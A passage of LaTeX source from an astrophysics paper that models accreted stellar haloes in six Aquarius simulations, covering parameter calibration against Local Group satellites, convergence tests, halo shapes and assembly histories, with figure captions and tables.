that galaxy. Stars formed in situ are likely to contribute to the
innermost regions of the stellar halo, within which they may be
redistributed in mergers. However, the dynamics of stars formed in a
dissipationally-collapsed, baryon-dominated thin disc cannot be
represented with particles chosen from a dark matter-only
simulation. We choose instead to study the accreted component in
isolation. Our technique none the less offers the possibility of
extracting \textit{some} information on a fraction of in situ stars
were we to assign them to dark matter particles (those contributing
to the bulge or forming at early times, for example). We choose to
omit this additional complexity here. SPH simulations of stellar
haloes (which naturally model the in situ component more accurately
than the accreted component) suggest that the contribution of in
situ stars to the halo is small beyond $\sim20$~kpc
(Abadi {et~al.} 2006; Zolotov {et~al.} 2009).
At early times, when the principal halo in each simulation is
growing rapidly and near-equal-mass mergers are common, the
definition of the `main' branch of its merger tree can become
ambiguous. Also, the main branch of the galaxy merger tree need not
follow the main branch of the halo tree. Hence, our choice of which
branch to exclude (on the basis that it is forming `in situ' stars)
also becomes ambiguous; indeed, it is not clear that any of these
`equivalent' early branches should be excluded. Later we will show
that two of our haloes have concentrated density profiles. We have
confirmed that these \textit{do not} arise from making the `wrong'
choice in these uncertain cases, i.e. from tagging particles in the
dynamically robust core of the `true' main halo. Making a different
choice of the excluded branch in these cases (before the principal
branch can be unambiguously identified) simply replaces one of these
concentrated components with another very similar
component. Therefore, we adopt the above definition of the galaxy
main branch when excluding in situ stars.
\end{enumerate}
\subsubsection{Individual satellites}
We show in \newt{the following section}
that with a suitable choice of
the most-bound fraction, our method produces \reft{a population of}
model satellites at $z=0$ \newt{having} properties
consistent with observed relationships between
magnitude, half-light radius/surface brightness and velocity
dispersion for satellite populations of the Milky Way and M31. In
\fig{fig:examplesatA11z0} we show profiles of surface brightness and
velocity dispersion for two individual satellites from these models at
$z=0$, chosen to give a rough match to observations of Fornax and
Carina. This suggests that our galaxy formation model and the simple
prescription for the spatial distribution of star formation
\reft{can} produce realistic stellar structures within dark
haloes. However, while it is possible to match these \reft{individual}
observed satellites with examples drawn from our models, we caution
that we can only match their observed surface brightness and velocity
dispersion profiles \textit{simultaneously} by choosing model
satellites that have suffered substantial tidal stripping. \newt{This
is most notable in the case of} \newt{o}ur match to
Fornax\newt{, which} retains only 2\% of its dark matter relative to
the time of its accretion to the main halo, and 20\% of its stellar
mass. \newt{However, as we show in \mnsec{sec:assembly}, the majority
of massive surviving satellites have not suffered substantial tidal
stripping.}
We have tested our method with assignments for each satellite
delayed until the time of infall, as in De~Lucia \& Helmi (2008). This
results in slightly more compact galaxies than in our standard
\textit{in vivo} approach, where mergers and tidal forces (and
relaxation through two-body encounters for objects near the
resolution limit) can increase the energies of tagged dark matter
particles. However, we find that this makes little difference to the
results that we discuss below.
\subsubsection{Parameter constraints and convergence}
\label{sec:constraints}
\begin{figure}
\includegraphics[]{fig3.eps}
\caption{Median effective radius \newt{$r_{\rm{eff}}$} (enclosing half
of the total luminosity in projection) as a function of magnitude
for model satellites in haloes Aq-A and Aq-F at $z=0$. \newt{A thin
vertical dashed line indicates the softening scale of the
simulation: $r_{\rm{eff}}$ is unreliable close to this value and
meaningless below it.} \textit{Thick lines} represent \newt{our}
higher-resolution simulation\newt{s} (Aq-2) using a range of values
of the fraction of most bound particles chosen in a stellar
population assignment, $f_{\rm{MB}}$. \textit{Dotted lines}
correspond to lower resolution simulations (Aq-3) of the same
haloes. A \textit{thick dashed line} shows the corresponding median
of \newt{observations of} Local Group dwarf galaxies. These
galaxies, and our model data points for all haloes in the Aq-2
series with $f_{\rm{MB}}=1\%$, are plotted individually in
\fig{fig:satellite_relations}.}
\label{fig:resolutiontests}
\end{figure}
We now compare the $z=0$ satellite populations of our models with
trends observed in the dwarf companions of the Milky Way and M31 in
order to determine a suitable choice of the fixed fraction,
$f_{\rm{MB}}$, of the most bound dark matter particles selected in a
given halo. \newt{O}ur aim is to study the stellar halo, \newt{and
therefore} we use the sizes of our \newt{surviving} satellites as a
constraint on $f_{\rm{MB}}$ and as a test of convergence. Within the
range of $f_{\rm{MB}}$ that produces plausible satellites, the gross
properties of our haloes, such as total luminosity, change by only a
few percent.
In \fig{fig:resolutiontests}, we show the relationship between the
absolute magnitudes, $M_{\rm{V}}$, of satellites (combining data from
two of our simulations, Aq-A and Aq-F), and the projected radius
enclosing one half of their total luminosity, which we refer to as the
effective radius, $r_{\rm{eff}}$. \newt{We
compare our models to} a compilation of dwarf galaxy data in the
Local Group, including the satellites of the Milky Way and M31. The slope of the
median relation for our satellites agrees well with that of the data
for the choices $f_{\rm{MB}}=1\%$ and $3\%$. It is clear that a choice
of $5\%$ produces bright satellites that are too extended, while for
$0.5\%$ they are too compact. We therefore prefer $f_{\rm{MB}}=1\%$. A
more detailed comparison to the data at this level is problematic: the
observed sample of dwarf galaxies available at any given magnitude is
small, and the data themselves contain puzzling features such as an
apparently systematic difference in size between the bright Milky Way
and M31 satellites.
\begin{figure*}
\includegraphics[]{fig4.eps}
\caption{Projected half-light radius (left), mean luminosity-weighted
1D velocity dispersion (centre) and central surface brightness
(right) of simulated satellite galaxies (defined by
$r_{\rm{GC}}<280\,\rm{kpc}$) that survive in all haloes at $z=0$, as
a function of absolute \textit{V}-band magnitude. Observational data
for Milky Way and M31 satellites are shown as orange symbols; values
are from Mateo (1998) and other authors as follows: bright
satellites (triangles pointing right, Grebel, Gallagher \& Harbeck 2003); faint MW
satellites discovered since 2005 (triangles pointing
up, Martin, de~Jong \& Rix 2008); M31 dwarf spheroidals (triangles pointing
left, McConnachie {et~al.} 2006; Martin {et~al.} 2009); M31 ellipticals (squares); Local
Group `field' dwarf spheroidals and dwarf irregulars (stars). In the
central panel we use data for Milky Way satellites only tabulated by
Wolf {et~al.} (2009) and for the SMC, Grebel {et~al.} (2003). In the
rightmost panel, we plot data for the Milky Way and M31
(Grebel {et~al.} 2003; Martin {et~al.} 2008). A dashed line indicates the surface
brightness of an object of a given magnitude with
$r_{\rm{eff}}=2.8\epsilon$, the gravitational softening scale (see
\mnsec{sec:aquarius}).}
\label{fig:satellite_relations}
\end{figure*}
\fig{fig:resolutiontests} also shows (as dotted lines) the same results
for our model run on the lower-resolution simulations of haloes Aq-A and
Aq-F. The particle mass in the Aq-3 series is approximately three times
greater than in Aq-2, and the force softening scale is larger by a
factor of two. We concentrate on the convergence behaviour of our
simulations for galaxies larger than the softening length, and also
where our sample provides a statistically meaningful number of galaxies
at a given magnitude; this selection corresponds closely to the regime
of the brighter dwarf spheroidal satellites of the Milky Way and M31,
$-15<M_{\rm{V}}<-5$. In this regime, \fig{fig:resolutiontests} shows
convergence of the median relations brighter than $M_{\rm{V}}=-5$ for
$f_{\rm{MB}}=3\%$ and $5\%$. The case for $f_{\rm{MB}}=1\%$ is less
clear-cut. The number of particles available for a given assignment is
set by the mass of the halo; haloes near the resolution limit (with
$\sim100$ particles) will, of course, have only $\sim1$ particle
selected in a single assignment. In addition to this poor resolution,
galaxies formed by such small-number assignments are more sensitive to
spurious two-body heating in the innermost regions of subhaloes. We
therefore expect the resulting galaxies to be dominated by few-particle
`noise' and to show poor
convergence behaviour.
We adopt $f_{\rm{MB}}=1\%$ as a reasonable match to the data (noting
also that it lies close to the power-law fit employed by
Bullock \& Johnston (2005) to map luminosities to satellite sizes). We believe
the resulting satellites to be sufficiently converged at the
resolution of our Aq-2 simulations with this choice of $f_{\rm{MB}}$
to permit a statistical study of the disrupted population represented
by the stellar halo. In support of this assertion, we offer the
following heuristic argument. The change in resolution from Aq-3 to
Aq-2 results in approximately three times more particles being
selected at fixed $f_{\rm{MB}}$; likewise, a change in $f_{\rm{MB}}$
from 1\% to 3\% selects three times more particles at fixed
resolution. Therefore, as $f_{\rm{MB}}=3\%$ has converged at the
resolution of Aq-3, it is reasonable to expect that $f_{\rm{MB}}=1\%$
selects a sufficient number of particles to ensure that satellite
sizes are not dominated by noise at the resolution of Aq-2. We show
below that the most significant contribution to the halo comes from a
handful of well resolved objects with $M_{\rm{V}} < -10$, rather than
from the aggregation of many fainter satellites. Additionally, as
demonstrated for example by
Pe{\~{n}}arrubia, McConnachie \& Navarro (2008a); Pe{\~{n}}arrubia, Navarro, \& McConnachie (2008b); Pe{\~{n}}arrubia {et~al.} (2009), there is a
`knife-edge' between the onset of stellar stripping and total
disruption for stars deeply embedded within the innermost few percent
of the dark matter in a halo. We conclude that premature stripping
resulting from an over-extension of very small satellites in our model
is unlikely to alter the gross properties of our stellar haloes.
The points raised above in connection with \fig{fig:resolutiontests}
make clear that the \textit{in vivo} particle tagging approach demands
extremely high resolution, near the limits of current cosmological
N-body simulations. The choice of $f_{\rm{MB}}=1\%$ in this approach
(from an acceptable range of $1-3\%$) is not arbitrary. For example, a
choice of $f_{\rm{MB}}=10\%$ (either as a round-number estimate,
For the remainder of this paper we concentrate on the higher
resolution Aq-2 simulations. In \fig{fig:satellite_relations} we fix
$f_{\rm{MB}}$ at 1\% and compare the surviving satellites from all
six of our haloes with observational data for three properties
correlated with absolute magnitude: effective radius,
$r_{\rm{eff}}$, mean luminosity-weighted line-of-sight velocity
dispersion, $\sigma$, and central surface brightness, $\mu_{0}$
(although the latter is not independent of $r_{\rm{eff}}$). In all
cases our model satellites agree well with the trends and scatter in
the data brighter than $M_{\rm{V}} = -5$.
The force softening scale of the simulation (indicated in the first
and third panels by dashed lines) effectively imposes a maximum
density on satellite dark haloes. \newt{At} \newt{t}his radial scale
we would expect $r_{\rm{eff}}$ to become independent of magnitude
\newt{for numerical reasons}: \fig{fig:satellite_relations} shows that
the $r_{\rm{eff}}(M_{\rm{V}})$ relation becomes
steeper for galaxies fainter than
$M_{\rm{V}}\sim-9\,$, corresponding to
$r_{\rm{eff}}\sim200\,\rm{pc}$. This resolution-dependent maximum
density corresponds to a minimum surface brightness at a given
magnitude. The low-surface-brightness limit in the Milky Way data
shown in the right-hand panel of \fig{fig:satellite_relations}
corresponds to the completeness limit of current surveys
(e.g. Koposov {et~al.} 2008; Tollerud {et~al.} 2008). The lower surface brightness
satellite population predicted by our model is not, in principle,
incompatible with current data.
In \fig{fig:m300} we show the relationship between total luminosity
and the mass of dark matter enclosed within 300~pc, $M_{300}$, for our
simulated satellites in all haloes. This radial scale is well-resolved
in the level 2 Aquarius simulations (see also Font et al. 2009, in
prep.). Our galaxies show a steeper trend than the data of
Strigari {et~al.} (2008), with the strongest discrepency (0.5 dex in
$M_{300}$) for the brightest satellites. Nevertheless, both show very
little variation, having $M_{300}\sim10^{7}\,\rm{M_{\sun}}$ over five
orders of magnitude in luminosity. \newt{I}n agreement with previous
studies using semi-analytic models and lower-resolution N-body
simulations (Macci{\`{o}}, Kang \& Moore 2009; Busha {et~al.} 2009; Li {et~al.} 2009b; Koposov {et~al.} 2009), and N-body
gasdynamic simulations (Okamoto \& Frenk 2009), we find that
this characteristic scale arises naturally as a result of
astrophysical processes including gas cooling, star formation and
feedback.
\begin{figure}
\includegraphics[]{fig5.eps}
\caption{Mass in dark matter enclosed within 300 pc ($M_{300}$) as a
function of luminosity (\textit{V}-band) for satellites in each of our
simulated haloes (coloured points, colours as
\fig{fig:galform_lf}). Maximum likelihood values of $M_{300}$ for
Milky Way dwarf spheroidals from Strigari {et~al.} (2008) are shown
(orange squares), with error bars indicating the range with
likelihood greater than 60.6\% of the maximum.}
\label{fig:m300}
\end{figure}
\subsection{Defining the stellar halo and satellite galaxies}
\label{sec:defining_haloes}
To conclude this section, we summarise the terminology we adopt when
describing our results. Tagged dark matter particles in the
self-bound haloes and subhaloes identified by \subfind{} constitute
our `galaxies'. Our stellar haloes comprise all tagged particles
bound to the main halo in the simulation, along with those tagged
particles not in any bound group (below we impose an additional
radial criterion on our definition of the stellar halo). All
galaxies within 280~kpc of the centre of the main halo are classed
as `satellites', as in the luminosity functions shown in
\fig{fig:galform_lf}. Centres of mass of the stellar haloes and
satellites are determined from tagged particles only, using the
iterative centring process described by
Power {et~al.} (2003).
Many structural elements of a galaxy intermix within a few kiloparsecs
of its centre, and attempts to describe the innermost regions of a
stellar halo require a careful and
unambiguous definition of other components present. This is especially
important when distinguishing between those components that are
represented in our model and those that are not. Therefore, before
describing our haloes\footnote{We explicitly distinguish between the
stellar halo and the dark halo in ambiguous cases; typically the
former is implied throughout}, we first summarise some of these
possible sources of confusion, clarify what is and is not included in
our model, and define a range of galactocentric distances on which we
will focus our analysis of the stellar halo.
As discussed above, our model does not track with particles any
stars formed in situ in the central `Milky Way' galaxy, whether in a
rotationally supported thin disc or otherwise (this central galaxy
is, of course, included in the underlying semi-analytic model). We
therefore refer to the halo stars that \textit{are} included in our
model as \textit{accreted} and those that form in the central galaxy
(and hence are \textit{not} explicitly tracked in our model) as \textit{in
situ}. Observational definitions of the `stellar halo' typically do
not attempt to distinguish between accreted and in situ stars, only
between components separated empirically by their kinematic, spatial
and chemical properties.
The `contamination' of a purely-accreted halo by stars formed in situ
is likely to be most acute near the plane of the disc. Observations of
the Milky Way and analogous galaxies frequently distinguish a `thick
disc' component (Gilmore \& Reid 1983; Carollo {et~al.} 2009) thought to
result either from dynamical heating of the thin disc by minor mergers
(e.g. Toth \& Ostriker 1992; Quinn, Hernquist \& Fullagar 1993; Velazquez \& White 1999; Font {et~al.} 2001; Benson {et~al.} 2004; Kazantzidis {et~al.} 2008)
or from accretion debris
(Abadi {et~al.} 2003; Yoachim \& Dalcanton 2005, 2008). \movt{The presence of such a
component in M31 is unclear: an `extended disc' is observed
(Ibata {et~al.} 2005), which rotates rapidly, contains a young stellar
population and is aligned with the axes of the thin disc, but
extends to $\sim40\,\rm{kpc}$ and shows many irregular morphological
features suggestive of a violent origin.} In principle, our model
\newt{will follow the formation of} accreted
thick discs. However, \newt{the stars in our model only feel the
potential of the dark halo}; the presence of a
massive baryonic disc could significantly alter this potential in the
central region and \newt{influence} the formation of \newt{an} accreted thick
disc (e.g. Velazquez \& White 1999).
\newt{O}ur models \newt{include that part of the galactic bulge built
from accreted stars, but none of the many other possible processes
of bulge formation (starbursts, bars etc.)}. However, the
interpretation of this component, the signatures of an observational
counterpart and the extent to which our simulation accurately
represents its dynamics are all beyond the scope of this
paper. \newt{Instead}, we will consider stars within \rbulge{} of the
dark halo potential centre as `accreted bulge', and define those
between \rbulge{} and a maximum radius of 280~kpc as the `stellar
halo' on which we will focus our analysis. This arbitrary radial cut
is chosen to exclude the region in which the observational separation
of `bulge' and `halo' stars is not straightforward, and which is
implicitly excluded from conventional observational definitions of
the halo. It is \textit{not} intended to reflect a physical
scale-length or dichotomy in our stellar haloes, analogous to that
claimed for the Milky Way
(e.g. Carollo {et~al.} 2007, 2009). Beyond \rbulge{} we
believe that the ambiguities discussed above and the `incompleteness'
of our models with regard to stars formed {\em in situ} should not
substantially affect the comparison of our \textit{accreted} stars
with observational data.
\section{Results: The Aquarius Stellar Haloes}
\label{sec:results}
\begin{figure*}
\centering \includegraphics[width=160mm]{fig6.eps}
\caption{\textit{V}-band surface
brightness of our model haloes (and surviving satellites), to a
limiting depth of $35\,\rm{mag/arcsec^{2}}$. The axis scales are in
kiloparsecs. Only stars formed in satellites are present in our
particle model; there is no contribution to these maps from a
central galactic disc or bulge formed in situ (see
\mnsec{sec:defining_haloes}) }
\label{fig:surfacebrightness}
\end{figure*}
\begin{figure*}
\centering
\centering \includegraphics[width=160mm]{fig7.eps}
\caption{As \fig{fig:surfacebrightness}, but here showing only those
stars stripped from satellites that survive at $z=0$}
\label{fig:sbsurvivors}
\end{figure*}
\begin{table*}
\begin{minipage}{160mm} \caption{For each of our simulated haloes
we tabulate: the luminosity and mass of halo stars (in the range
$3<r<280$~kpc); the mass of accreted bulge stars ($r<3$~kpc); the
total stellar mass and \textit{V}-band magnitude of the central galaxy in
\galform{}; the number of surviving satellites (brighter than
$M_{\rm{V}}=0$); the fraction of the total stellar mass within
280~kpc bound in surviving satellites at $z=0$, $f_{\rm{sat}}$;
the fraction of \textit{halo} stellar mass ($r<280$~kpc)
contributed by these surviving satellites, $f_{\rm{surv}}$; the
number of halo progenitors, $N_{\rm{prog}}$ (see text); the
half-light radius of the stellar halo ($r<280$~kpc); the inner and
outer slope and break radius of a broken power-law fit to the
three-dimensional density profile of halo stars ($3<r<280$~kpc).}
\begin{tabular}{@{}lcccccccccccccc}
\hline
Halo &
$L_{V,\rm{halo}}$&
$M_{\star,\rm{halo}}$&
$M_{\star,\rm{bulge}}$&
$M_{\rm{gal}}$&
$M_{V}$&
$N_{\rm{sat}}$&
$f_{\rm{sat}}$&
$f_{\rm{surv}}$&
$N_{\rm{prog}}$&
$r_{1/2}$&
$n_{\rm{in}}$&
$n_{\rm{out}}$&
$r_{\rm{brk}}$ \\
&
$[10^{8} \rm{L_{\sun}}]$ &
$[10^{8} \rm{M_{\sun}}]$ &
$[10^{8} \rm{M_{\sun}}]$ &
$[10^{10} \rm{M_{\sun}}]$ &
&
&
&
&
&
$\rm{[kpc]}$ & & & $\rm{[kpc]}$ \\
\hline
A & 1.51 & 2.80 & 1.00 & 1.88 & -20.3 & 161 & 0.61 & 0.065 & 3.8 & 20 & -2.7 & -8.2 & 80.4\\
B & 1.27 & 2.27 & 3.33 & 1.49 & -20.1 & 91 & 0.07 & 0.036 & 2.4 & 2.3 & -4.2 & -5.8 & 34.6\\
C & 1.95 & 3.58 & 0.34 & 7.84 & -21.3 & 150 & 0.28 & 0.667 & 2.8 & 53 & -2.0 & -9.4 & 90.8\\
D & 5.55 & 9.81 & 1.32 & 0.72 & -19.1 & 178 & 0.35 & 0.620 & 4.3 & 26 & -2.0 & -5.9 & 37.7\\
E & 0.90 & 1.76 & 16.80 & 0.45 & -18.6 & 135 & 0.11 & 0.003 & 1.2 & 1.0 & -4.7 & -4.4 & 15.2\\
F & 17.34 & 24.90 & 6.42 & 1.36 & -20.1 & 134 & 0.28 & 0.002 & 1.1 & 6.3 & -2.9 & -5.9 & 14.0\\
\hline
\end{tabular}
\label{tbl:summary}
\end{minipage}
\end{table*}
In this section, we present the six stellar haloes resulting from the
application of the method described above to the Aquarius
simulations. Here our aim is to characterise the assembly history of
the six haloes and their global properties. Quantities measured for
each halo are collected in \mntab{tbl:summary}. These include a measure of the number of progenitor galaxies
contributing to the stellar halo, $N_{\rm{prog}}$. This last quantity
is not the total number of accreted satellites, but instead is defined
as $N_{\rm{prog}}=M_{\rm{halo}}^{2}/\sum_{i}{m_{\rm{{prog,i}}}^{2}}$
where $m_{\rm{{prog,i}}}$ is the stellar mass contributed by the i'th
progenitor. $N_{\rm{prog}}$ is equal to the total number of
progenitors in the case where each contributes equal mass, or to the
number of significant progenitors in the case where the remainder
provide a negligible contribution.
\subsection{Visualisation in projection}
\label{sec:projections}
A $300\times300\:\rm{kpc}$ projected surface brightness map of each
stellar halo at $z=0$ is shown in
\fig{fig:surfacebrightness}. Substantial diversity among the six
haloes is apparent. Haloes Aq-B and Aq-E are distinguished by
their strong central concentration, with few features of detectable
surface brightness beyond $\sim 20\,\rm{kpc}$. Haloes Aq-A, Aq-C,
Aq-D and Aq-F all show more extended envelopes to 75-100 kpc; each
envelope is a superposition of streams and shells that have been
phase-mixed to varying degrees.
Analogues of many morphological features observed in the halo of M31
(Ibata {et~al.} 2007; Tanaka {et~al.} 2009; McConnachie {et~al.} 2009) and other galaxies
(e.g. Mart{\'{i}}nez-Delgado {et~al.} 2008) can be found in our simulations. For
example, the lower left quadrant of Aq-A
shows arc-like features reminiscent of a complex of `parallel' streams
in the M31 halo labelled A, B, C and D by Ibata {et~al.} (2007) and
Chapman {et~al.} (2008), which have surface brightnesses of
$30-33\,\rm{mag\,arcsec^{{-}2}}$ and a range of metallicities
(Tanaka {et~al.} 2009). These streams in Aq-A can also be traced faintly in
the upper right quadrant of the image and
superficially resemble the edges of `shells'. In fact, they result
from two separate progenitor streams, each tracing multiple wraps of
decaying orbits (and hence contributing more than one `arc'
each). Seen in three dimensions, these two debris complexes (which are
among the most significant contributors to the Aq-A halo) are
elaborate and irregular structures, the true nature of which is not
readily apparent in any given projection\footnote{Three orthogonal
projections for each halo can be found at
\url{http://www.virgo.dur.ac.uk/aquarius}}.
The brightest and most coherent structures visible in
\fig{fig:surfacebrightness} are attributable to the most recent
accretion events. To illustrate the contribution of
recently-infalling objects (quantified in
\mnsec{sec:assembly}), we show the same projections of the haloes in
\fig{fig:sbsurvivors}, but include only those stars whose parent
satellite survives at $z=0$. In haloes Aq-C and Aq-D, stars stripped
from surviving satellites constitute $\sim60-70\%$ of the halo, while in
the other haloes their contribution is $\lesssim10\%$. Not all
the recently-infalling satellites responsible for bright halo features
survive; for example, the massive satellite that merges at $z\sim0.3$
and produces the prominent set of `shells' in Aq-F.
\begin{table}
\caption{Axial ratios $q=c/a$ and $s=b/a$ of stellar-mass-weighted
three-dimensional ellipsoidal fits to halo stars within a
galactocentric radius of 10 kpc. These were determined using the
iterative procedure described by Allgood {et~al.} (2006), which
attempts to fit the shapes of self-consistent `isodensity'
contours. A spherical contour of $r=10$~kpc is assumed
initially; the shape and orientation of this contour are then
updated on each iteration to those obtained by diagonialzing the
inertia tensor of the mass enclosed (maintaining the length of
the longest axis). The values thus obtained are slightly more
prolate than those obtained from a single diagnonalization using
all mass with a spherical contour (i.e. the first iteration of
our approach), reflecting the extremely flattened shapes of our
haloes at this radius. The oblate shape of Aq-E is not sensitive
to this choice of method.}
\begin{tabular}{@{}lcccccc}
\hline
Halo & A & B & C & D & E & F\\
\hline
$q_{10}$ & 0.27 & 0.28 & 0.29 & 0.33 & 0.36 & 0.21\\
$s_{10}$ & 0.30 & 0.32 & 0.32 & 0.42 & 0.96 & 0.25\\
\hline
\end{tabular}
\label{tbl:shapes}
\end{table}
\fig{fig:surfacebrightness} shows that all our haloes are notably
flattened, particularly in the central regions where \newt{most} of
their light is concentrated. Axial ratios $q=c/a$ and $s=b/a$ of
three-dimensional ellipsoidal fits to halo stars within 10 kpc of the
halo centre are given in \mntab{tbl:shapes} (these fits include stars
within the accreted bulge region defined above). \movt{Most of
our haloes are strongly prolate within 10~kpc. Halo Aq-E is very
different, having a highly oblate (i.e. disc-like) shape in this
region -- this structure of $\sim20$~kpc extent can be seen `edge
on' in \fig{fig:surfacebrightness} \newt{and can be described as} an `accreted thick disc'
\newt{(e.g. Abadi {et~al.} 2003; Pe{\~{n}}arrubia, McConnachie \& Babul 2006; Read {et~al.} 2008)}. We defer
further analysis of this interesting object to a subsequent
paper.} Beyond 10--30~kpc, the stellar mass in our haloes is not
\newt{smoothly }distributed but \movt{instead} consists of a number of discrete
streams, plumes and other irregular structures. Fits to all halo stars
assuming a smoothly varying ellipsoidal distribution of mass interior
to a given radius do not accurately describe these sparse outer
regions.
Few observations of stellar halo shapes are available for comparison
with our models. M31 is the only galaxy in which a projected stellar
halo has been imaged to a depth sufficient to account for a
significant fraction of halo stars. Pritchet \& van~den Bergh (1994) measured a
projected axial ratio for the M31 halo at $\sim10$~kpc of
$\sim0.5$. Ibata {et~al.} (2005) describe a highly irregular and rotating
inner halo component or `extended disc' (to $\sim40\,\rm{kpc}$) of
$27-31\,\rm{mag/arcsec^{2}}$, aligned with the thin disc and having an
axial ratio $\sim0.6$ in projection. Zibetti \& Ferguson (2004) find a
similar axial ratio for the halo of a galaxy at $z=0.32$ observed in
the Hubble ultra-deep field. Evidence for the universality of
flattened stellar haloes is given by Zibetti, White \& Brinkmann (2004), who find a
best-fitting projected axial ratio of $\sim0.5-0.7$ for the low
surface brightness envelope of $\sim1000$ stacked edge-on late-type
galaxies in SDSS. A mildly \textit{oblate} halo with $c/a\sim0.6$ is
reported for the Milky Way, with an increase in flattening at smaller
radii ($<20$~kpc;
e.g. Chiba \& Beers 2000; Bell {et~al.} 2008; Carollo {et~al.} 2007). Interestingly,
Morrison {et~al.} (2009) present evidence for a highly flattened halo
($c/a\sim0.2$) component in the Solar neighbourhood, which appears to
be dispersion-supported (i.e. kinematically \textit{distinct} from a
rotationally supported thick disc).
The shapes of components in our haloes selected by their kinematics,
chemistry or photometry may be very different to those obtained from
the aggregated stellar mass. A full comparison, accounting for the
variety of observational selections, projection effects and
definitions of `shape' used in the measurements cited above, is beyond
the scope of this paper. We emphasize, however, that the flattening in
our stellar haloes cannot be attributed to any `baryonic' effects such
as a thin disc potential (e.g. Chiba \& Beers 2001) or star formation in
dissipative mergers and bulk gas flows
(e.g. Bekki \& Chiba 2001). Furthermore, it is unlikely to be the result
of a (lesser) degree of flattening in the dark halo. Instead the
structure of these components is most likely to reflect the
intrinsically anisotropic distribution of satellite orbits. In certain
cases (for example, Aq-D and Aq-A), it is clear that several
contributing satellites with correlated trajectories are responsible
for reinforcing the flattening of the inner halo.
\subsection{Assembly history of the stellar halo}
\label{sec:assembly}
We now examine when and how our stellar haloes were
assembled. \fig{fig:halogrowth} shows the mass fraction of each
stellar halo (here \textit{including} the accreted bulge component
defined in \mnsec{sec:defining_haloes}) in place (i.e. unbound from
its parent galaxy) at a given redshift. We count \newt{as belonging to the stellar halo} all `star particles'
bound to the main dark halo and within 280 kpc of \newt{its} centre at $z=0$. This is compared with the growth of
the corresponding host dark haloes. \newt{O}ur sample spans a range of assembly histories for haloes
even though the halos have very similar final mass.
\begin{figure}
\includegraphics[width=84mm,clip=True, trim=0mm 0cm 0cm
0cm]{fig8.eps}
\caption{The growth of the stellar halo (\textit{upper panel}) and the
dark matter halo (the principal branch; \textit{lower panel}) as a
function of expansion factor (\textit{bottom axis}) or redshift
(\textit{top axis}). Lines show the mass fraction of each halo in
place at a given time. Stars are counted as belonging to the stellar
halo when the DM particle that they tag is assigned to the principal
halo, or is not bound to any \subfind{} group.}
\label{fig:halogrowth}
\end{figure}
Not surprisingly, the growth of the dark halo is considerably
\newt{more smooth} than that of the stellar halo. The
`luminous' satellite accretion events contributing stars
\newt{are} a small subset of those that contribute to
the dark halo, which additionally accrete\newt{s} a
substantial fraction of its mass in the form of `diffuse' dark matter
\newt{(Wang et
al. in prep.)}. As described in detail by
Pe{\~{n}}arrubia {et~al.} (2008a,b), the dark haloes of infalling
satellites must be heavily stripped before the deeply embedded stars
are removed. This gives rise to time-lags seen in \fig{fig:halogrowth}
between the major events building dark and stellar haloes.
To characterise the similarities and differences between their
histories, we subdivide our sample of six stellar haloes into two
broad categories: those that grow through the gradual accretion of
many progenitors (Aq-A, Aq-C and Aq-D) and those for which the
majority of stellar mass is contributed by only one or two major
events (Aq-B, Aq-E and Aq-F). We refer to this latter case as
`few-progenitor' growth. The measure of the number of
`most-significant' progenitors given in \mntab{tbl:summary},
$N_{\rm{prog}}$, also ranks the haloes by the `smoothness' of their
accretion history, reflecting the intrinsically stochastic nature of
their assembly.
\fig{fig:victim_vs_survivor_lf} compares the luminosity
functions (LFs) of surviving satellites with \newt{that of those} totally disrupted \newt{to form the
stellar halo}, measuring luminosity at the time of infall in
both cases. In general, there are fewer disrupted satellites than
survivors over almost all luminosities, although the numbers and
luminosities of the very brightest contributors and survivors are
comparable in each halo. The deficit in the number of disrupted
satellites relative to survivors is most pronounced in the
few-progenitor haloes Aq-B and Aq-F.
\begin{figure}
\includegraphics[width=84mm,clip=True, trim=0cm 0cm 0cm 0cm]{fig9.eps}
\caption{Luminosity functions of surviving satellites (solid) in each
of our six haloes, compared with those of totally disrupted halo
progenitors (dashed). These are constructed using only stars formed
in each satellite before the time of infall (the halo-subhalo
transition). The luminosity of each population is that after
evolution to $z=0$.}
\label{fig:victim_vs_survivor_lf}
\end{figure}
\fig{fig:contributions} summarises \movt{the
individual accretion events that contribute to the assembly of the
stellar halo}, plotting the stellar mass of the most significant
progenitor satellites against their redshift of infall (the
time at which their host halo first \newt{becomes} a
subhalo of the main FOF group). Here we class as significant those
satellites which together contribute 95\% of the total halo stellar
mass (this total is shown as a vertical line for each halo) when
accumulated in rank order of their contribution. By this measure there
are (5,6,8,6,6,1) significant progenitors for haloes (A,B,C,D,E,F). We
also compare the masses of the brightest Milky Way satellites to the
significant contributors in our stellar haloes. Typically the most
significant contributors have masses comparable to the most massive
surviving dwarf spheroidals, Fornax and Sagittarius.
\begin{figure}
\includegraphics[width=84mm,clip=True,trim=0 0 0 0]{fig10.eps}
\caption{\textit{Main panel}: for satellites that have been stripped
to form the stellar haloes, symbols show the redshift of infall and
total mass contributed to the stellar halo at $z=0$ (in the range $3
< r < 280\,\rm{kpc}$). Vertical lines indicate the total mass of
each stellar halo in this radial range. The right-hand $y$-axis is
labelled by lookback time in gigayears. We plot only those
satellites whose individual contributions, accumulated in rank order
from the most significant contributor, account for 95\% of the total
stellar halo mass. Satellites totally disrupted by $z=0$ are plotted
as open circles, surviving satellites as filled squares (in almost
all cases the contributions of these survivors are close to their
total stellar masses; see text). \textit{ Lower panel:} symbols
indicate the approximate masses of bright MW satellites, assuming a
stellar mass-to-light ratio of 2; the Sgr present-day mass estimate
is that given by Law, Johnston \& Majewski (2005). The shaded region indicates an
approximate range for the MW halo mass in our halo regime (see
e.g. Bell {et~al.} 2008).}
\label{fig:contributions}
\end{figure}
\begin{figure}
\includegraphics[width=84mm]{fig11.eps}
\caption{Cumulative mass fraction of each stellar halo originating in
satellites of stellar mass less than $M_{\rm{sat}}$. Satellite
masses are normalised to the total stellar halo mass
$M_{\rm{halo}}$ in each case, as defined in
\mnsec{sec:defining_haloes}.}
\label{fig:carlos_contribs}
\end{figure}
\begin{figure}
\includegraphics[width=84mm]{fig12.eps}
\caption{Number of surviving satellites (aggregated over all six
haloes) which have lost a fraction, $f_{\rm{stripped}}$, of the
stellar mass through tidal stripping. Satellites are divided into
three mass bins: massive (purple), intermediate (dashed orange)
and low-mass (dotted black) as quantified in the legend. The
leftmost bin (demarcated by a vertical line) shows the number of
satellites that have not suffered any stellar mass loss.}
\label{fig:stripping}
\end{figure}
With the exception of Aq-F, all the most significant contributors to
our stellar haloes were accreted more than 8 Gyr ago. We highlight (as
filled squares) those contributors whose cores survive as self-bound
objects at $z=0$. We find that surviving satellites accreted before
